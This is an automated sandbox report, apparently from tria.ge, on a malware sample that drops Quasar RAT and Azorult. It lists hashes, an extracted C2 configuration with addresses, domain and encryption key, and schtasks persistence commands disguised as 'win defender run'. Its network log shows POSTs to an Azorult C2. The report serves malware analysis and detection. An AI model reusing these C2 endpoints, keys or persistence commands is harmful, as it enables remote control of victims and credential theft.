Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
06/03/2025, 02:28 UTC
General
-
Target
eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
-
Size
2.0MB
-
MD5
7888711f3d11f449955d82d767ee9762
-
SHA1
5fc94a3d3d7aff5884a1732ee796b3f5fdd3364b
-
SHA256
eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b
-
SHA512
40d3b9548fb12f0ff0d035c654349d0e849c9715d81f3ae82909214596461247f5832672c2fc0aff30e9e5d329194c554e433fb8642a68635be78c92b4e9733b
-
SSDEEP
24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYf:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yx
Malware Config
Extracted
quasar
1.3.0.0
EbayProfiles
5.8.88.191:443
sockartek.icu:443
QSR_MUTEX_0kBRNrRz5TDLEQouI0
-
encryption_key
MWhG6wsClMX8aJM2CVXT
-
install_name
winsock.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
win defender run
-
subdirectory
SubDir
Extracted
azorult
http://0x21.in:8000/_az/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 3 IoCs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 13 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 39 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1603⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
Network
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1 -
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:28:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 288
Access-Control-Allow-Origin: *
X-Ttl: 59
X-Rl: 40
-
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:28:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 288
Access-Control-Allow-Origin: *
X-Ttl: 58
X-Rl: 36
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in:8000/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 97
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Mar 2025 02:28:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=303dbd9df2044d937dcdf6b86f7250c7|212.102.63.147|1741228104|1741228104|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 97
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Mar 2025 02:28:25 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=b3f155569080a2adec974065625a8fe3|212.102.63.147|1741228105|1741228105|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
44.221.84.105:8000http://0x21.in:8000/_az/http
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
44.221.84.105:8000http://0x21.in/_az/http
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
5.8.88.191:443
-
8.8.8.8:53ip-api.comdns
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
405KB
MD5b8ba87ee4c3fc085a2fed0d839aadce1
SHA1b3a2e3256406330e8b1779199bb2b9865122d766
SHA2564e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
SHA5127a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
-
Filesize
349KB
MD5b4a202e03d4135484d0e730173abcc72
SHA101b30014545ea526c15a60931d676f9392ea0c70
SHA2567050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
SHA512632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
376KB
-
Filesize
376KB